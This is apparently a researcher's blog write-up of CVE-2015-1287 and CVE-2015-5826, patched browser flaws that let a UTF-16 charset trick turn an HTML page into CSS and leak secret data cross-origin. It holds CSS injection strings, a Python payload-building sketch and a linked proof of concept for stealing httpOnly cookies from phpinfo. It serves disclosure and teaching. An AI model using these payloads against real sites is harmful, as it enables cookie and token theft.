This blog post is a write-up of CVE-2015-1287 and CVE-2015-5826

Prologue

If you are a boring person like me and read specs in your spare time, you may have come across this potential attack described in the CSP 2 spec:

[..] if the user agent uses a lax CSS parsing algorithm, an attacker might be able to trick the user agent into accepting malicious "stylesheets" hosted by an otherwise trustworthy origin.

Lax Parsing

Unlike JavaScript, which stops parsing as soon as a syntax error is encountered, CSS parsing rules allow the parser to skip over certain illegal parts in quirks mode.

How This Was Abused

Back in 2009, Chris Evans discovered that such behavior can lead to cross-domain theft. The attack works by finding a page that reflects GET parameters, injecting a crafted payload into it, and importing the page as a stylesheet in an attacker-controlled page. Since a picture is worth a thousand words, here is a picture which depicts the attack:

How the attack is conducted

In short, attackers inject two strings, a pre-string ({}#f{font-family:') and a post-string (';}), that surround the secret data. The junk is ignored, while the payload turns the secret data into the value of a CSS property (font-family in this case), which can then be read back through the computed style. Note that the injected strings do not contain characters usually considered harmful (such as angle brackets), so they will generally not be escaped.

Ultimately this attack can lead to data exfiltration. Since cookies are sent along with the request, the stolen data can contain a CSRF token or personal information.

There are, however, certain restrictions on this attack:

  • The extracted data needs to sit in between the pre-string and the post-string. Having two injection points on the same page is possible but not very common
  • The extracted data cannot contain both single and double quotes at the same time (because the data needs to be treated as a CSS string)
  • The extracted data cannot contain line breaks (CSS string does not support multiple lines)

These conditions are not easy to meet, especially the "no line breaks" requirement, since line breaks are inevitable in modern coding style.
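The last two restrictions can be expressed as a quick check. This is only a minimal sketch: the function name is made up for illustration, and it only tests whether a piece of data could sit inside a single CSS string literal as described above.

```python
def extractable_by_classic_attack(secret: str) -> bool:
    """Return True if `secret` could be swallowed by one CSS string literal.

    Hypothetical helper, not part of any browser or library.
    """
    # A CSS string cannot span multiple lines.
    has_line_break = any(ch in secret for ch in "\n\r\f")
    # The attacker can pick ' or " as the delimiter, but not if both appear.
    has_both_quotes = "'" in secret and '"' in secret
    return not has_line_break and not has_both_quotes


print(extractable_by_classic_attack("csrf=abc123"))        # single line, no quotes
print(extractable_by_classic_attack("line one\nline two"))  # contains a line break
```

Anything spanning more than one line of markup fails the check, which is why the original attack rarely applies to real pages.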

How It Ended

Internet Explorer and Firefox disabled the ability to import CSS cross-origin when it is served with an incorrect MIME type (that is, anything other than text/css). Webkit-based browsers, on the other hand, kept loading such resources for the sake of compatibility but applied strict parsing (stop parsing as soon as an error is encountered) to cross-origin CSS. The approach Webkit adopted is also suggested by CSP 2:

[..] User agents SHOULD defend against both attacks using the same mechanism: stricter CSS parsing rules for style sheets with improper MIME types.

Thinking Out Of The Box

The suggested defense looks like a perfect balance: it resolves the issue while not breaking old websites which use an incorrect MIME type for CSS. Well, it surely does not break those websites, but it is not unbreakable either. It assumes that attackers are unlikely to be able to influence a document in such a way that its content is valid CSS. What I am going to tell you is that we can indeed make a document syntactically valid with a little help from the charset.

Manipulating Charset

The CSS spec defines the precedence of what charset should be used for a stylesheet:

  1. BOM
  2. Content-Type header (e.g. Content-Type: text/html; charset=utf-8)
  3. Environment encoding (the charset attribute of <link>)

If a page does not specify a BOM or a charset in Content-Type, the encoding decision will fall back to the environment encoding, which we can control. The BOM is not really an issue since it is rarely used. The Content-Type header is a bit tougher because modern frameworks set it by default, though it is not uncommon to see a page without a charset specified in Content-Type for various reasons. Facebook is an example: it does not set the charset through Content-Type but instead relies on <meta charset>.

Facebook HTTP Response
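The precedence above can be sketched in a few lines of Python. This is a simplified illustration that follows only the three steps listed in this post; the function names, the BOM table and the "utf-8" default are my assumptions and not taken from any browser source.

```python
import re
from typing import Optional

# Byte order marks and the encodings they indicate.
BOMS = [
    (b"\xef\xbb\xbf", "utf-8"),
    (b"\xfe\xff", "utf-16-be"),
    (b"\xff\xfe", "utf-16-le"),
]


def charset_from_content_type(header: Optional[str]) -> Optional[str]:
    """Pull the charset parameter out of a Content-Type value, if present."""
    if not header:
        return None
    match = re.search(r'charset\s*=\s*"?([^";\s]+)', header, re.IGNORECASE)
    return match.group(1).lower() if match else None


def pick_stylesheet_encoding(body: bytes,
                             content_type: Optional[str],
                             link_charset: Optional[str],
                             default: str = "utf-8") -> str:
    """Hypothetical helper: BOM first, then the header, then <link charset>."""
    for bom, name in BOMS:
        if body.startswith(bom):
            return name
    header_charset = charset_from_content_type(content_type)
    if header_charset:
        return header_charset
    if link_charset:
        return link_charset.lower()
    return default  # assumed fallback, not discussed in this post


# The header wins when it carries a charset...
print(pick_stylesheet_encoding(b"<html>", "text/html; charset=utf-8", "utf-16"))
# ...otherwise the attacker-chosen <link charset> decides.
print(pick_stylesheet_encoding(b"<html>", "text/html", "utf-16"))
```

The second call is the interesting case: with no BOM and no charset in the header, the value supplied by the importing page is what ends up being used.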

Fiddling CSS Syntax

Now to the most interesting part: forcing a document to be valid CSS. Before that, we need to understand the syntax.

Stylesheet

A CSS file is a stylesheet. It has to start with @-rules or rulesets. Since it is nearly impossible for a document to start with @, or for us to pull one out of thin air, we are only interested in rulesets.

Ruleset

A ruleset is essentially a selector plus a block. Selectors come in different types, but most of them contain an identifier. According to the spec, identifiers can contain only the characters [a-zA-Z0-9] and ISO 10646 characters U+00A0 and higher, plus the hyphen (-) and the underscore (_). In other words, CSS accepts a wide range of Unicode characters (U+00A0 to U+10FFFF) in identifiers but is strict about ASCII: a single bracket or quote, both of which are common in an HTML document, makes the identifier invalid.
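To make the character rule concrete, here is a small check written as a regular expression. It is a simplification that only covers the allowed character set quoted above; the full identifier grammar has further rules (for example about leading digits and escapes) which are ignored here, and the function name is made up.

```python
import re

# Allowed identifier characters as quoted from the spec:
# [a-zA-Z0-9], hyphen, underscore, and anything from U+00A0 upwards.
IDENT_CHARS = re.compile(r"[A-Za-z0-9_\-\u00a0-\U0010ffff]+")


def only_identifier_chars(text: str) -> bool:
    """Hypothetical helper: True if every character may appear in an identifier."""
    return IDENT_CHARS.fullmatch(text) is not None


print(only_identifier_chars("main-nav_2"))        # plain ASCII identifier
print(only_identifier_chars("<div class='x'>"))   # typical HTML fragment
print(only_identifier_chars("\u685c\u6973"))      # arbitrary non-ASCII characters
```

Ordinary HTML fails because of its brackets, quotes and spaces, while a run of arbitrary characters above U+00A0 passes.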

How UTF-16 Comes Into Play

Unlike most charsets, UTF-16 always maps two or more bytes to one character, even for ASCII.

Charset Mapping

Now you start to see the pattern: we can tell the parser that the document should be decoded as UTF-16, and all of a sudden the whole document becomes a valid identifier! This is because the transformation "eliminates" all ASCII characters, including line breaks and quotes: every pair of ASCII bytes is merged into a single non-ASCII character, and an actual ASCII character in UTF-16 needs a NUL byte as padding. We then add a wildcard selector (*) so that the following rule matches an element.

So now that we have the selector settled, the parser goes on to expect a block.
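The effect is easy to reproduce outside a browser. The sketch below decodes a made-up HTML fragment as little-endian UTF-16 (the byte order and the helper name are my assumptions) and checks that no ASCII character survives.

```python
def decode_as_utf16le(body: bytes) -> str:
    """Decode bytes as UTF-16LE, dropping a trailing odd byte if there is one."""
    even = body[: len(body) - len(body) % 2]
    return even.decode("utf-16-le")


# A made-up fragment with brackets, both quote types and a line break.
html = b"<p class=\"a\">it's\n</p>"
decoded = decode_as_utf16le(html)

# Every pair of ASCII bytes collapses into one character far above U+00A0.
lowest = min(ord(ch) for ch in decoded)
print(len(html), "bytes ->", len(decoded), "characters")
print("lowest code point: U+%04X" % lowest)

# A real ASCII character, on the other hand, needs a NUL byte next to it.
print("*".encode("utf-16-le"))
```

Because each two-byte unit is built from two non-NUL ASCII bytes, its value can never drop into the ASCII range, so quotes and line breaks simply stop existing as far as the CSS parser is concerned.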

Block

At this point we just need to find an injection point and open a block to complete our payload. For the declaration, we need a property that accepts an arbitrary string value so that we can steal the secret data. font-family is the perfect choice as it accepts not only strings but also identifiers. Let's see what we've got so far:

Identifier(junk), * { font-family: Identifier(secret data)  

And that's it! ...Wait, where is the closing brace (})? Actually we can ignore it and it still remains valid. As per spec, when the parser reaches EOF (End-of-File), the block will be closed automatically. Taking advantage of it, we only need one injection point to perform the attack.
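Putting the pieces together, the following sketch builds such a payload and shows what the page looks like once it is read as UTF-16. Everything in it is illustrative: the page content, the token and the helper names are made up, little-endian byte order is assumed, and the one-byte alignment padding is my own assumption about how an attacker would keep the payload on a two-byte boundary.

```python
INJECTION = ",*{font-family:"


def build_payload(bytes_before_injection: int) -> bytes:
    """Encode the injection as UTF-16LE so it survives the charset switch."""
    # Assumed detail: pad by one byte if the injection would start at an odd offset.
    pad = b"a" if bytes_before_injection % 2 else b""
    return pad + INJECTION.encode("utf-16-le")  # ASCII characters plus NUL bytes


def view_as_utf16le(body: bytes) -> str:
    """Decode as UTF-16LE, dropping a trailing odd byte if there is one."""
    return body[: len(body) - len(body) % 2].decode("utf-16-le")


# Hypothetical target page: junk, one reflected parameter, then the secret.
before = b"<html><body>\nq="
after = b"\ncsrf_token='abc123'\n"
page = before + build_payload(len(before)) + after

junk, marker, stolen = view_as_utf16le(page).partition(INJECTION)

# `stolen` is what would end up as the font-family value; re-encoding it
# gives back the original bytes that followed the injection point.
recovered = stolen.encode("utf-16-le")
print(recovered)
```

Note that the secret here contains both a line break and quotes, which the original 2009 attack could not have handled, and that only one injection point is used.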

Nosniff?

You may wonder: isn't X-Content-Type-Options there precisely to prevent such an attack? Unfortunately, for some reason Webkit does not honor this header when importing CSS. In other words, having X-Content-Type-Options: nosniff has no effect when the document is being treated as an external stylesheet.

Limitation

To sum up, the attack works when the following conditions are met:

  • The target does not have charset set in the Content-Type header
  • The injection point does not sanitize NUL byte

Compared with the original attack, these conditions are far easier to meet, so the chance of a successful attack increases tremendously.

PoC

"PoC || GTFO" - whoever

The following PoC demonstrates how this attack can steal a victim's cookies from phpinfo. Phpinfo is a common source of information leakage that exposes limited server information and HTTP request information. Normally it is immune to XSS, but with this attack we can exfiltrate httpOnly cookies from the victim, since it meets all the attack requirements (i.e. no charset in the header and NUL bytes accepted).

PoC (Chrome 43, Safari 8 or iOS 8): http://innerht.ml/csstheft/phpinfo.html

PoC on phpinfo

Fix

Webkit and Blink fixed the issue by refusing to load a cross-origin document as CSS when it is served with an incorrect MIME type.

Patched message
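The rule behind the fix can be summed up in a few lines. This is a sketch of the policy as described in this post, not the actual Webkit or Blink code; the function name is hypothetical, and the assumption that same-origin documents are unaffected is mine.

```python
from typing import Optional


def may_load_as_stylesheet(same_origin: bool, content_type: Optional[str]) -> bool:
    """Hypothetical policy check: cross-origin CSS must be served as text/css."""
    if same_origin:
        # Assumption: the fix only concerns cross-origin loads.
        return True
    # Ignore parameters such as charset and compare the bare MIME type.
    mime = (content_type or "").split(";", 1)[0].strip().lower()
    return mime == "text/css"


print(may_load_as_stylesheet(False, "text/html"))                # HTML page imported as CSS
print(may_load_as_stylesheet(False, "text/css; charset=utf-8"))  # genuine stylesheet
```

With this check in place, the charset trick no longer matters, because the HTML document is rejected before any parsing happens.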

Although patched in modern browsers, I reckon there are still some homemade browsers which are vulnerable.

Further Reading

  • There is also a similar attack against CSS's counterpart, JavaScript, called XSSI
  • First-Party-Only Cookies is a proposed solution which prevents cookies from being sent in a third-party context
  • Entry Point Regulation is an alternative which restricts documents from being used as external resources, although IMO the manifest is rather verbose

References